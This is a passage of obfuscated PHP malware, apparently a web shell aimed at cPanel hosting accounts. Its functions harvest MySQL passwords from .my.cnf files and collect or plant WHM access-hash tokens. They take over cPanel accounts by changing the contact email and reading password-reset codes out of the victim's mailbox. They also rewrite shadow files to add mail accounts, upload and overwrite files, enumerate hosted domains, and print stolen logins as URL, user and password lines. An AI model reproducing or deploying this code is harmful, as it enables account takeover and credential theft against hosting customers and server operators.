@mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/.Archive");
@mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/.Drafts");
@mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/.Sent");
@mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/.spam");
@mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/.Trash");
@mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/cur");
@mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/new");
@mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/tmp");
su59Q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/dovecot-acl-list", $GLOBALS[ð][0x2]);
su59q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/dovecot-uidlist", $GLOBALS[ð][0x1f4]);
sU59Q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/dovecot-uidvalidity", $GLOBALS[ð][0x1fa]);
Su59q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/dovecot-uidvalidity.5e196afc", $GLOBALS[ð][0x2]);
SU59Q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/dovecot.index.log", $GLOBALS[ð][0x2]);
sU59q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/dovecot.list.index.log", $GLOBALS[ð][0x2]);
Su59q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/dovecot.mailbox.log", $GLOBALS[ð][0x2]);
SU59q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/maildirsize", $GLOBALS[ð][0x219]);
sU59Q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/subscriptions", $GLOBALS[ð][0x1f3]);
$GMTKc = $stR_2 . $GLOBALS[ð][0x7e] . $ACEox . $GLOBALS[ð][0x21a] . $GLOBALS[ð][0x21b];
if (file_exists($uU2VV)) {
$Wu7is = $GLOBALS[ð][0x2];
$t08MP = UFEQC($uU2VV);
if (!strstr($t08MP, $USGuv . $GLOBALS[ð][0x1f0])) {
$Wu7is .= $GLOBALS[ð][0x1f1] . $USGuv . $GLOBALS[ð][0x1f2];
}
$Wu7is .= $GMTKc;
$Wu7is .= $t08MP;
SU59q($uU2VV, $Wu7is);
}
if (file_exists($QQ8bf)) {
$Wu7is = $GLOBALS[ð][0x2];
$t08MP = UFeQC($QQ8bf);
if (!strstr($t08MP, $USGuv . $GLOBALS[ð][0x1f0])) {
$Wu7is .= $GLOBALS[ð][0x1f1] . $USGuv . $GLOBALS[ð][0x1f5];
}
$Wu7is .= $GMTKc;
$Wu7is .= $t08MP;
sU59Q($QQ8bf, $Wu7is);
} else {
$Wu7is = $GLOBALS[ð][0x2];
$t08MP = $GLOBALS[ð][0x2];
$Wu7is .= $GLOBALS[ð][0x1f6] . $USGuv . $GLOBALS[ð][0x1f7];
$Wu7is .= $GMTKc;
su59Q($QQ8bf, $Wu7is);
}
$dr_Lq = "{$stR_2}@{$USGuv}|{$tLGR8}";
echo "<smtp><domain>Domian => {$USGuv}</domain><port><br>Port => 587</port><smtpname><br>SMTPname => {$stR_2}</smtpname><password><br>Password => {$tLGR8}</password></smtp><br>\n";
return $stR_2;
}
function Kenwx($WnpSY, $tLGR8)
{
global $e6zLE;
$Sxpg6 = array($GLOBALS[ð][0x89] => $WnpSY, $GLOBALS[ð][0x8a] => $tLGR8, $GLOBALS[ð][0x8b] => $GLOBALS[ð][0x8c]);
$D_ctQ = sMvYq($e6zLE . $GLOBALS[ð][0x8d], null, $Sxpg6);
if (preg_match($GLOBALS[ð][0x86], $D_ctQ) || preg_match($GLOBALS[ð][0x87], $D_ctQ) || preg_match($GLOBALS[ð][0x88], $D_ctQ)) {
return !0;
}
return !1;
}
function aUM2F()
{
global $USGuv;
global $WnpSY;
global $GEgR8;
if (uFEQC("/home{$GEgR8}{$WnpSY}/.my.cnf")) {
$EKHbT = UFEQc("/home{$GEgR8}{$WnpSY}/.my.cnf");
preg_match($GLOBALS[ð][0x1b9], $EKHbT, $QObCn);
preg_match($GLOBALS[ð][0x1b8], $EKHbT, $jPaTv);
if (preg_match($GLOBALS[ð][0x1b7], $EKHbT)) {
if (!empty($QObCn[0x1])) {
$kLoFX = $QObCn[0x1];
} elseif (!empty($jPaTv[0x1])) {
$kLoFX = $jPaTv[0x1];
}
if (isset($kLoFX)) {
if (kenwX($WnpSY, $kLoFX) == !0) {
echo "\n<br><cpanel>https://{$USGuv}:2083|{$WnpSY}|{$kLoFX}</cpanel>";
}
}
}
}
}
function rrMp2($my6fw)
{
global $WnpSY;
global $GEgR8;
global $e6zLE;
global $t08MP;
SU59q("/home{$GEgR8}{$WnpSY}/.contactemail", $my6fw);
su59q("/home{$GEgR8}{$WnpSY}/.cpanel/contactinfo", $GLOBALS[ð][0x2f] . $my6fw);
$DInZ0 = array($GLOBALS[ð][0x3b] => $WnpSY, $GLOBALS[ð][0x3c] => $GLOBALS[ð][0x3d]);
$D_ctQ = sMvYQ("{$e6zLE}/resetpass", null, $DInZ0);
if (preg_match($GLOBALS[ð][0x30], $D_ctQ)) {
if (isset($t08MP)) {
f6uQd();
}
aum2f();
unlink($GLOBALS[ð][0x32]);
die($GLOBALS[ð][0x31]);
}
$IQVSV = array($GLOBALS[ð][0x33] => $GLOBALS[ð][0x34], $GLOBALS[ð][0x35] => $WnpSY, $GLOBALS[ð][0x36] => $my6fw, $GLOBALS[ð][0x37] => $GLOBALS[ð][0x2], $GLOBALS[ð][0x38] => $my6fw, $GLOBALS[ð][0x39] => $GLOBALS[ð][0x3a]);
$BZKHp = smvYQ("{$e6zLE}/resetpass", null, $IQVSV);
if (preg_match($GLOBALS[ð][0x3e], $BZKHp)) {
unlink("/home{$GEgR8}{$WnpSY}/.contactemail");
unlink("/home{$GEgR8}{$WnpSY}/.cpanel/contactinfo");
sU59q("/home{$GEgR8}{$WnpSY}/.contactemail", $my6fw);
chmod("/home{$GEgR8}{$WnpSY}/.contactemail", 0600);
$BZKHp = sMvYq("{$e6zLE}/resetpass", null, $IQVSV);
}
if (preg_match($GLOBALS[ð][0x2e], $BZKHp)) {
return !1;
}
return !0;
}
function i7GRf($e20Gs)
{
sleep(0x7);
$Z3hyF = 0;
$M34yy = scandir($e20Gs);
foreach ($M34yy as $FcCNX) {
if ($FcCNX != $GLOBALS[ð][0xd1] && $FcCNX != $GLOBALS[ð][0xd2] && $FcCNX != $GLOBALS[ð][0xd3]) {
$Z3hyF++;
$DBsEl = ufeQC($e20Gs . $GLOBALS[ð][0x85] . $FcCNX);
if (preg_match($GLOBALS[ð][0xd4], $DBsEl, $bjkID)) {
$SSP9u = $bjkID[0x1];
}
}
}
if (empty($SSP9u) && $Z3hyF > 0) {
global $dr_Lq;
global $IyBvl;
$dr_Lq = explode($GLOBALS[ð][0xc0], $dr_Lq);
$my6fw = $dr_Lq[0];
$tLGR8 = $dr_Lq[0x1];
$Bbpdj = array($GLOBALS[ð][0xcd] => $my6fw, $GLOBALS[ð][0xce] => $tLGR8, $GLOBALS[ð][0xcf] => $GLOBALS[ð][0xd0]);
$nAXqQ = sMVyq("{$IyBvl}/login/", null, $Bbpdj);
if (preg_match($GLOBALS[ð][0xc1], $nAXqQ)) {
if (preg_match($GLOBALS[ð][0xc2], $nAXqQ, $MqnST)) {
$MqnST = $MqnST[0x1];
} elseif (preg_match($GLOBALS[ð][0xc3], $nAXqQ, $MqnST)) {
$MqnST = $MqnST[0x1];
} elseif (preg_match($GLOBALS[ð][0xc4], $nAXqQ, $MqnST)) {
$MqnST = $MqnST[0x1];
} elseif (preg_match($GLOBALS[ð][0xc5], $nAXqQ, $MqnST)) {
$MqnST = $MqnST[0x1];
} elseif (preg_match($GLOBALS[ð][0xc6], $nAXqQ, $MqnST)) {
$MqnST = $MqnST[0x1];
} elseif (preg_match($GLOBALS[ð][0xc7], $nAXqQ, $MqnST)) {
$MqnST = $MqnST[0x1];
} elseif (preg_match($GLOBALS[ð][0xc8], $nAXqQ, $MqnST)) {
$MqnST = $MqnST[0x1];
} else {
aUM2F();
f6uqd();
unlink($GLOBALS[ð][0xca]);
die($GLOBALS[ð][0xc9]);
}
$UwF6G = SMvYQ("{$IyBvl}/{$MqnST}/3rdparty/roundcube/");
$dVuXE = smVYQ("{$IyBvl}/{$MqnST}/3rdparty/roundcube/?_uid=1&_action=show");
if (preg_match($GLOBALS[ð][0xcb], $dVuXE, $bjkID)) {
$SSP9u = $bjkID[0x1];
} else {
$dVuXE = SMVYq("{$IyBvl}/{$MqnST}/3rdparty/roundcube/?_uid=2&_action=show");
if (preg_match($GLOBALS[ð][0xcc], $dVuXE, $bjkID)) {
$SSP9u = $bjkID[0x1];
}
}
}
}
if (empty($SSP9u)) {
AUM2f();
f6Uqd();
unlink($GLOBALS[ð][0xd6]);
die($GLOBALS[ð][0xd5]);
}
return $SSP9u;
}
function Gh_rF($e20Gs = null)
{
global $WnpSY;
global $USGuv;
global $e6zLE;
if ($e20Gs == null) {
$SSP9u = trim($_POST[$GLOBALS[ð][0xbf]]);
} else {
$SSP9u = i7gRF($e20Gs);
}
$PJswN = array($GLOBALS[ð][0xb1] => $WnpSY, $GLOBALS[ð][0xb2] => $GLOBALS[ð][0xb3], $GLOBALS[ð][0xb4] => $GLOBALS[ð][0x2], $GLOBALS[ð][0xb5] => $SSP9u);
$DZZzM = SmVyq("{$e6zLE}/resetpass", null, $PJswN);
$kpaoN = cQXaS();
$su69k = array($GLOBALS[ð][0xb6] => $GLOBALS[ð][0xb7], $GLOBALS[ð][0xb8] => $WnpSY, $GLOBALS[ð][0xb9] => $kpaoN, $GLOBALS[ð][0xba] => $GLOBALS[ð][0xbb], $GLOBALS[ð][0xbc] => $GLOBALS[ð][0xbd], $GLOBALS[ð][0xbe] => $kpaoN);
$gZVpq = SMvyq("{$e6zLE}/resetpass", null, $su69k);
echo "<cpanel>https://{$USGuv}:2083|{$WnpSY}|{$kpaoN}</cpanel><br>\n";
}
function j91UX($stR_2 = null)
{
global $GEgR8;
global $WnpSY;
global $USGuv;
if (isset($_POST[$GLOBALS[ð][0x28]])) {
rrMp2(trim($_POST[$GLOBALS[ð][0x29]]));
exit(0);
} elseif (isset($_POST[$GLOBALS[ð][0x2a]])) {
gh_Rf();
unlink("/home{$GEgR8}{$WnpSY}/.contactemail");
unlink("/home{$GEgR8}{$WnpSY}/.cpanel/contactinfo");
unlink($GLOBALS[ð][0x2b]);
exit(0);
}
if (rrmp2("{$stR_2}@{$USGuv}") == !1) {
aum2f();
f6Uqd();
unlink($GLOBALS[ð][0x2c]);
die($GLOBALS[ð][0x2d]);
}
Gh_rf("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/new");
f6UqD();
}
function F6UQd()
{
global $t08MP;
global $GEgR8;
global $WnpSY;
global $USGuv;
$QQ8bf = "/home{$GEgR8}{$WnpSY}/etc/{$USGuv}/shadow";
$uU2VV = "/home{$GEgR8}{$WnpSY}/etc/shadow";
sU59q($QQ8bf, $t08MP);
Su59Q($uU2VV, $t08MP);
chmod($QQ8bf, 0640);
chmod($uU2VV, 0640);
unlink("/home{$GEgR8}{$WnpSY}/.contactemail");
unlink("/home{$GEgR8}{$WnpSY}/.cpanel/contactinfo");
}
function UhztB($jpODZ)
{
global $FDWty;
if (isset($_POST[$GLOBALS[ð][0x267]])) {
rename(trim($_POST[$GLOBALS[ð][0x268]]), trim($_POST[$GLOBALS[ð][0x269]]));
$i83r4 = trim($_POST[$GLOBALS[ð][0x26b]]);
$cHB_F = PDWSI($i83r4, $GLOBALS[ð][0x26a]);
chmod($i83r4, 0644);
su59Q($i83r4, $cHB_F);
exit;
}
$AX0EH = $_FILES[$GLOBALS[ð][0x265]][$GLOBALS[ð][0x274]];
if ($jpODZ == 0x1) {
$u3Q11 = $FDWty . $_FILES[$GLOBALS[ð][0x26d]][$GLOBALS[ð][0x26e]];
} elseif ($jpODZ == 0x2) {
$ya3mT = substr(str_shuffle($GLOBALS[ð][0x26f]), 0x2d);
mkdir($ya3mT);
sU59Q($ya3mT . $GLOBALS[ð][0x270], $GLOBALS[ð][0x271]);
$u3Q11 = $ya3mT . $GLOBALS[ð][0x105] . $_FILES[$GLOBALS[ð][0x264]][$GLOBALS[ð][0x26e]];
} else {
$u3Q11 = $_FILES[$GLOBALS[ð][0x272]][$GLOBALS[ð][0x273]];
}
$kUkI7 = move_uploaded_file($AX0EH, $u3Q11);
if (!$kUkI7) {
$kUkI7 = copy($AX0EH, $u3Q11);
}
if ($kUkI7) {
echo "<successfully>Uploaded successfully.</successfully>";
if ($jpODZ == 0x2) {
echo "<br><folder>{$ya3mT}</folder>";
}
}
}
function Wc4SH()
{
global $FDWty;
$Etebm = $_POST[$GLOBALS[ð][0x21f]];
$CFDzr = 0;
$Z0beW = array($FDWty . $GLOBALS[ð][0x21c], $FDWty . $GLOBALS[ð][0x21d], $FDWty . $GLOBALS[ð][0x21e]);
foreach ($Z0beW as $oxb9V) {
if (file_exists($oxb9V)) {
$QCGIr = Su59q($oxb9V, $Etebm);
if (!$QCGIr) {
unlink($oxb9V);
Su59q($oxb9V, $Etebm);
}
$CFDzr = 0x1;
}
}
if ($CFDzr == 0) {
foreach ($Z0beW as $oxb9V) {
sU59q($oxb9V, $Etebm);
}
}
echo "./Done";
}
function ZX3AV($WnpSY, $vfUVq)
{
global $hEUZd;
$vfUVq = str_replace($GLOBALS[ð][0x1], $GLOBALS[ð][0x2], $vfUVq);
$VmjkA = array("Authorization:WHM {$WnpSY}:{$vfUVq}");
$D_ctQ = SMvyQ($hEUZd . $GLOBALS[ð][0x90], $VmjkA, null);
if (preg_match($GLOBALS[ð][0x8e], $D_ctQ) || preg_match($GLOBALS[ð][0x8f], $D_ctQ)) {
return !0;
}
return !1;
}
function rsq3X()
{
global $WnpSY;
global $GEgR8;
if (uFEQc($GLOBALS[ð][0x244])) {
$ILX08 = uFeqc($GLOBALS[ð][0x245]);
$ILX08 = explode($GLOBALS[ð][0x1], trim($ILX08));
foreach ($ILX08 as $MocnV) {
$c7ie0 = explode($GLOBALS[ð][0x7e], $MocnV);
$c7ie0 = $c7ie0[0];
if (uFeqc("/home{$GEgR8}{$c7ie0}/.accesshash")) {
$vfUVq = UFEQc("/home{$GEgR8}{$c7ie0}/.accesshash");
$vfUVq = str_replace($GLOBALS[ð][0x3], $GLOBALS[ð][0x2], $vfUVq);
if (ZX3aV($c7ie0, $vfUVq) == !0) {
echo "<font color=\"green\"><center>[+] Accesshash </center> </font><br>\\n";
}
}
}
}
if (UFeQc("/home{$GEgR8}{$WnpSY}/.accesshash")) {
$vfUVq = ufEqc("/home{$GEgR8}{$WnpSY}/.accesshash");
$vfUVq = str_replace($GLOBALS[ð][0x1], $GLOBALS[ð][0x2], $vfUVq);
if (ZX3av($WnpSY, $vfUVq) == !0) {
echo "<font color=\"green\"><center>[+] Accesshash </center> </font><br>\\n";
}
} else {
unlink("/home{$GEgR8}{$WnpSY}/.accesshash");
$LUpGY = substr(str_shuffle($GLOBALS[ð][0x248]), 0x3);
Su59Q("/home{$GEgR8}{$WnpSY}/.accesshash", $LUpGY);
chmod("/home{$GEgR8}{$WnpSY}/.accesshash", 0600);
if (Zx3av($WnpSY, $vfUVq) == !0) {
echo "<font color=\"green\"><center>[+] Accesshash </center> </font><br>\\n";
} else {
unlink("/home{$GEgR8}{$WnpSY}/.accesshash");
}
}
}
function SWRgg()
{
global $WnpSY;
global $GEgR8;
if (UFEQc($GLOBALS[ð][0x4e])) {
$MULSm = Ufeqc($GLOBALS[ð][0x51]);
$MULSm = explode($GLOBALS[ð][0x3], trim($MULSm));
foreach ($MULSm as $MocnV) {
$c7ie0 = explode($GLOBALS[ð][0x4f], $MocnV);
$c7ie0 = $c7ie0[0];
if (UFeqc("/home{$GEgR8}{$c7ie0}/.my.cnf")) {
echo "<font color=\"green\"><center>[+] mycnf </center> </font><br>";
}
}
} elseif (UfEQC("/home{$GEgR8}{$WnpSY}/.my.cnf")) {
echo "<font color=\"green\"><center>[+] mycnf </center> </font><br>";
}
}
function UgUZa()
{
global $XG7BU;
$kX5Kz = $GLOBALS[ð][0x4b] . $XG7BU;
$aMb4b = fW1Ye($kX5Kz);
$hs4Qn = json_decode($aMb4b)->{$GLOBALS[ð][0x4d]};
$Qczmw = json_decode($aMb4b)->{$GLOBALS[ð][0x4c]};
return array($hs4Qn, $Qczmw);
}
function YdVh6($jpODZ)
{
global $ACEox;
global $GEgR8;
global $WnpSY;
global $XG7BU;
global $USGuv;
$Z3hyF = 0;
echo "<ip>{$XG7BU}</ip>";
if (is_dir("/home{$GEgR8}{$WnpSY}/.cpanel")) {
$rm7Yy = uFEqC($GLOBALS[ð][0x221]);
if (!$rm7Yy) {
echo "<error># can't ReaD -> [ /etc/named.conf ]</error>";
}
preg_match_all($GLOBALS[ð][0x223], $rm7Yy, $zXPiY);
$AnvGa = array_unique($zXPiY[0x1]);
foreach ($AnvGa as $eRn5x) {
$Z3hyF++;
if ($jpODZ == 0x1) {
echo "{$eRn5x}\n";
}
}
} elseif (preg_match("/{$USGuv}/", $ACEox)) {
preg_match("#/(.*)\\/{$USGuv}/#", $ACEox, $SrYD9);
$SrYD9 = $GLOBALS[ð][0x85] . $SrYD9[0x1];
$AnvGa = a7gCn("ls {$SrYD9} | grep '\\.'");
$hWl0Q = explode($GLOBALS[ð][0x3], $AnvGa);
foreach ($hWl0Q as $eRn5x) {
if (is_file($SrYD9 . $GLOBALS[ð][0x85] . $eRn5x)) {
continue;
}
$Z3hyF++;
if ($jpODZ == 0x1) {
echo "{$eRn5x}\n";
}
}
if (!$AnvGa) {
$AnvGa = scandir($SrYD9);
foreach ($AnvGa as $eRn5x) {
if (is_file($SrYD9 . $GLOBALS[ð][0x105] . $eRn5x) || !strstr($eRn5x, $GLOBALS[ð][0xd1])) {
continue;
}
$Z3hyF++;
if ($jpODZ == 0x1) {
echo "{$eRn5x}\n";
}
}
}
} else {
echo "<error>can't get domains.</error>";
}
return $Z3hyF;
}
function U0TK3()
{
global $x3Uog;
global $ACEox;
global $GEgR8;
global $WnpSY;
global $USGuv;
global $XG7BU;
$GYhUj = uGuZA();
echo $GLOBALS[ð][0x60] . phpversion() . $GLOBALS[ð][0x61];
echo $GLOBALS[ð][0x6d] . $USGuv . $GLOBALS[ð][0x6e];
echo $GLOBALS[ð][0x5a] . $XG7BU . $GLOBALS[ð][0x5b];
echo $GLOBALS[ð][0x5e] . $x3Uog . $GLOBALS[ð][0x5f];
echo $GLOBALS[ð][0x6f] . $ACEox . $GLOBALS[ð][0x70];
echo $GLOBALS[ð][0x64] . $GYhUj[0] . $GLOBALS[ð][0x65];
echo $GLOBALS[ð][0x5c] . $GYhUj[0x1] . $GLOBALS[ð][0x5d];
echo $GLOBALS[ð][0x62] . ydVh6(0) . $GLOBALS[ð][0x63];
if (preg_match($GLOBALS[ð][0x6a], $x3Uog)) {
echo "<server><font color=\"red\"><center>[-] Windows</center> </font><br></server>";
} else {
echo "<server><font color=\"green\"><center>[+] Linux</center> </font><br></server>";
}
if (is_dir("/home{$GEgR8}{$WnpSY}/.cpanel")) {
echo "<cp><font color=\"green\"><center>[+] cPanel</center> </font><br></cp>";
} elseif (preg_match($GLOBALS[ð][0x67], $ACEox)) {
echo "<cp><font color=\"green\"><center>[+] vHosts</center> </font><br></cp>";
} else {
echo "<cp><font color=\"red\"><center>[-] There is no cPanel or vHosts.</center> </font><br></cp>";
}
}
function emGki($QmcTU)
{
$mH9bZ = array($GLOBALS[ð][0x19c] => $GLOBALS[ð][0x47], $GLOBALS[ð][0x19d] => $GLOBALS[ð][0x19e], $GLOBALS[ð][0x19f] => $GLOBALS[ð][0x1a0], $GLOBALS[ð][0x1a1] => $GLOBALS[ð][0x1a2], $GLOBALS[ð][0x1a3] => $GLOBALS[ð][0x1a4], $GLOBALS[ð][0x1a5] => $GLOBALS[ð][0x1a6], $GLOBALS[ð][0x1a7] => $GLOBALS[ð][0x1a8], $GLOBALS[ð][0x1a9] => $GLOBALS[ð][0x1aa], $GLOBALS[ð][0x1ab] => $GLOBALS[ð][0x1ac], $GLOBALS[ð][0x1ad] => $GLOBALS[ð][0x1ae], $GLOBALS[ð][0x1a0] => $GLOBALS[ð][0x1a3], $GLOBALS[ð][0x1aa] => $GLOBALS[ð][0x19d], $GLOBALS[ð][0x1af] => $GLOBALS[ð][0x1a1], $GLOBALS[ð][0x1a6] => $GLOBALS[ð][0x1b0], $GLOBALS[ð][0x1b1] => $GLOBALS[ð][0x1b2], $GLOBALS[ð][0x1b3] => $GLOBALS[ð][0x1b4], $GLOBALS[ð][0x1ac] => $GLOBALS[ð][0x1b5]);
$D6mgj = str_split($QmcTU);
$e50EE = $GLOBALS[ð][0x2];
foreach ($D6mgj as $wOVBe) {
if (in_array($wOVBe, $mH9bZ)) {
$e50EE .= $mH9bZ[$wOVBe];
} else {
$e50EE .= $wOVBe;
}
}
return $e50EE;
}
function bWQLE()
{
$qdMec = 0;
$ogEo3 = 0;
$ubZRU = 0;
$yp2PP = 0;
$BU0zm = 0;
$lQymy = 0;
$LOmS0 = trim($_POST[$GLOBALS[ð][0x191]]);
$Enic4 = fW1ye($LOmS0);
if (preg_match($GLOBALS[ð][0x106], $Enic4)) {
preg_match_all($GLOBALS[ð][0x107], $Enic4, $WHqbk);
foreach ($WHqbk[0x1] as $Teaxm) {
$ubZRU++;
}
if ($ubZRU > 0x190) {
die($GLOBALS[ð][0x108]);
}
}
preg_match_all($GLOBALS[ð][0x10c], $Enic4, $rPfM6);
if (preg_match($GLOBALS[ð][0x109], $LOmS0)) {
$zDvDR = str_replace($GLOBALS[ð][0x10a], $GLOBALS[ð][0x2], $LOmS0);
} else {
$zDvDR = str_replace($GLOBALS[ð][0x10b], $GLOBALS[ð][0x2], $LOmS0);
}
$zDvDR = substr($zDvDR, 0, strpos($zDvDR, $GLOBALS[ð][0x105]));
foreach ($rPfM6[0x1] as $Rd6Xn) {
$qdMec++;
if (preg_match($GLOBALS[ð][0x133], $Rd6Xn) || preg_match($GLOBALS[ð][0x134], $Rd6Xn)) {
$kX5Kz = $Rd6Xn . $GLOBALS[ð][0x135];
} elseif (preg_match($GLOBALS[ð][0x136], $Rd6Xn)) {
$kX5Kz = $GLOBALS[ð][0x137] . $zDvDR . $Rd6Xn . $GLOBALS[ð][0x138];
} else {
$kX5Kz = $LOmS0 . $Rd6Xn . $GLOBALS[ð][0x139];
}
$srSx9 = htmlspecialchars_decode(Fw1Ye($kX5Kz));
preg_match($GLOBALS[ð][0x13d], $srSx9, $QObCn);
preg_match($GLOBALS[ð][0x118], $srSx9, $jPaTv);
preg_match($GLOBALS[ð][0x17c], $srSx9, $gBiec);
preg_match($GLOBALS[ð][0x116], $srSx9, $pWfU0);
preg_match($GLOBALS[ð][0x17e], $srSx9, $eBwm4);
preg_match($GLOBALS[ð][0x120], $srSx9, $W_7qP);
preg_match($GLOBALS[ð][0x115], $srSx9, $UYuN4);
preg_match($GLOBALS[ð][0x142], $srSx9, $uXJkb);
preg_match($GLOBALS[ð][0x12c], $srSx9, $VknFC);
preg_match($GLOBALS[ð][0x13a], $srSx9, $zERE7);
preg_match($GLOBALS[ð][0x130], $srSx9, $YhDxn);
preg_match($GLOBALS[ð][0x12a], $srSx9, $rhB3r);
preg_match_all($GLOBALS[ð][0x146], $srSx9, $NK16o);
preg_match_all($GLOBALS[ð][0x110], $srSx9, $G2S_i);
preg_match_all($GLOBALS[ð][0x113], $srSx9, $QO5g8);
preg_match($GLOBALS[ð][0x144], $srSx9, $Jc7_H);
preg_match($GLOBALS[ð][0x112], $srSx9, $fFreY);
preg_match($GLOBALS[ð][0x132], $srSx9, $KK1cF);
preg_match_all($GLOBALS[ð][0x17f], $srSx9, $vV_wN);
preg_match($GLOBALS[ð][0x180], $srSx9, $VVbsx);
preg_match($GLOBALS[ð][0x12b], $srSx9, $O0_Gw);
preg_match($GLOBALS[ð][0x17d], $srSx9, $H3Dnq);
preg_match($GLOBALS[ð][0x13e], $srSx9, $qRVjf);
preg_match($GLOBALS[ð][0x111], $srSx9, $I1XA9);
preg_match($GLOBALS[ð][0x13c], $srSx9, $EQ0fI);
preg_match($GLOBALS[ð][0x13b], $srSx9, $owSpB);
preg_match($GLOBALS[ð][0x114], $srSx9, $pmwNx);
preg_match($GLOBALS[ð][0x143], $srSx9, $ow9vj);
preg_match($GLOBALS[ð][0x12f], $srSx9, $l5zPA);
preg_match($GLOBALS[ð][0x145], $srSx9, $KTQVw);
preg_match($GLOBALS[ð][0x177], $srSx9, $oDKH4);
preg_match($GLOBALS[ð][0x117], $srSx9, $eZeM_);
preg_match($GLOBALS[ð][0x119], $srSx9, $MQNcp);
preg_match($GLOBALS[ð][0x12d], $srSx9, $lMLuB);
preg_match($GLOBALS[ð][0x190], $srSx9, $TqGXu);
preg_match($GLOBALS[ð][0x131], $srSx9, $tB0uO);
if (!empty($lMLuB[0x1]) && !preg_match($GLOBALS[ð][0x12e], $srSx9)) {
$lQymy++;
} elseif (!empty($TqGXu[0x1])) {
$yp2PP++;
} elseif (!empty($tB0uO[0x1])) {
$BU0zm++;
}
if (!empty($QObCn[0x1])) {
echo $GLOBALS[ð][0x147] . $QObCn[0x1] . $GLOBALS[ð][0x148];
$ogEo3++;
} elseif (!empty($jPaTv[0x1])) {
echo $GLOBALS[ð][0x149] . $jPaTv[0x1] . $GLOBALS[ð][0x14a];
$ogEo3++;
} elseif (!empty($owSpB[0x1])) {
echo $GLOBALS[ð][0x14b] . $owSpB[0x1] . $GLOBALS[ð][0x14c];
$ogEo3++;
} elseif (!empty($gBiec[0x1])) {
echo $GLOBALS[ð][0x14d] . $gBiec[0x1] . $GLOBALS[ð][0x14e];
$ogEo3++;
} elseif (!empty($pWfU0[0x1])) {
echo $GLOBALS[ð][0x14f] . $pWfU0[0x1] . $GLOBALS[ð][0x150];
$ogEo3++;
} elseif (!empty($eBwm4[0x1])) {
echo $GLOBALS[ð][0x151] . $eBwm4[0x1] . $GLOBALS[ð][0x152];
$ogEo3++;
} elseif (!empty($W_7qP[0x1])) {
echo $GLOBALS[ð][0x153] . $W_7qP[0x1] . $GLOBALS[ð][0x154];
$ogEo3++;
} elseif (!empty($UYuN4[0x1])) {
echo $GLOBALS[ð][0x155] . $UYuN4[0x1] . $GLOBALS[ð][0x156];
$ogEo3++;
} elseif (!empty($m85ZG[0x1])) {
echo $GLOBALS[ð][0x157] . $m85ZG[0x1] . $GLOBALS[ð][0x158];
$ogEo3++;
} elseif (!empty($uXJkb[0x1])) {
echo $GLOBALS[ð][0x159] . $uXJkb[0x1] . $GLOBALS[ð][0x15a];
$ogEo3++;
} elseif (!empty($VknFC[0x1])) {
echo $GLOBALS[ð][0x15b] . $VknFC[0x1] . $GLOBALS[ð][0x15c];
$ogEo3++;
} elseif (!empty($zERE7[0x1])) {
echo $GLOBALS[ð][0x15d] . $zERE7[0x1] . $GLOBALS[ð][0x15e];
$ogEo3++;
} elseif (!empty($NK16o[0x1])) {
foreach ($NK16o[0x1] as $Ez2Fk) {
if (!($Ez2Fk == $GLOBALS[ð][0x15f])) {
echo $GLOBALS[ð][0x160] . $Ez2Fk . $GLOBALS[ð][0x161];
$ogEo3++;
}
}
} elseif (!empty($QO5g8[0x1])) {
foreach ($QO5g8[0x1] as $Ez2Fk) {
if (!($Ez2Fk == $GLOBALS[ð][0x162])) {
echo $GLOBALS[ð][0x163] . $Ez2Fk . $GLOBALS[ð][0x164];
$ogEo3++;
}
}
} elseif (!empty($Jc7_H[0x1])) {
echo $GLOBALS[ð][0x165] . $Jc7_H[0x1] . $GLOBALS[ð][0x166];
$ogEo3++;
} elseif (!empty($fFreY[0x1])) {
echo $GLOBALS[ð][0x167] . $fFreY[0x1] . $GLOBALS[ð][0x168];
$ogEo3++;
} elseif (!empty($KK1cF[0x1])) {
echo $GLOBALS[ð][0x169] . $KK1cF[0x1] . $GLOBALS[ð][0x16a];
$ogEo3++;
} elseif (!empty($VVbsx[0x1])) {
echo $GLOBALS[ð][0x16b] . $VVbsx[0x1] . $GLOBALS[ð][0x16c];
$ogEo3++;
} elseif (!empty($O0_Gw[0x1])) {
echo $GLOBALS[ð][0x16d] . $O0_Gw[0x1] . $GLOBALS[ð][0x16e];
$ogEo3++;
} elseif (!empty($vV_wN[0x1])) {
echo $GLOBALS[ð][0x16f] . $vV_wN[0x1][0x1] . $GLOBALS[ð][0x170];
$ogEo3++;
} elseif (!empty($O0_Gw[0x1])) {
echo $GLOBALS[ð][0x171] . $O0_Gw[0x1] . $GLOBALS[ð][0x172];
$ogEo3++;
} elseif (!empty($O0_Gw[0x1])) {
echo $GLOBALS[ð][0x173] . $O0_Gw[0x1] . $GLOBALS[ð][0x174];
$ogEo3++;
} elseif (!empty($pmwNx[0x1])) {
echo $GLOBALS[ð][0x175] . $pmwNx[0x1] . $GLOBALS[ð][0x176];
$ogEo3++;
}
if (!empty($G2S_i[0x1])) {
$Mo0Fh = $G2S_i[0x1][0x1];
preg_match_all($GLOBALS[ð][0x181], $Mo0Fh, $yz0ZU);
$yz0ZU = $yz0ZU[0x1][0];
echo $GLOBALS[ð][0x182] . $yz0ZU . $GLOBALS[ð][0x183];
$ogEo3++;
}
if (!empty($I1XA9[0x1])) {
echo $GLOBALS[ð][0x178] . $I1XA9[0x1] . $GLOBALS[ð][0x179];
$ogEo3++;
}
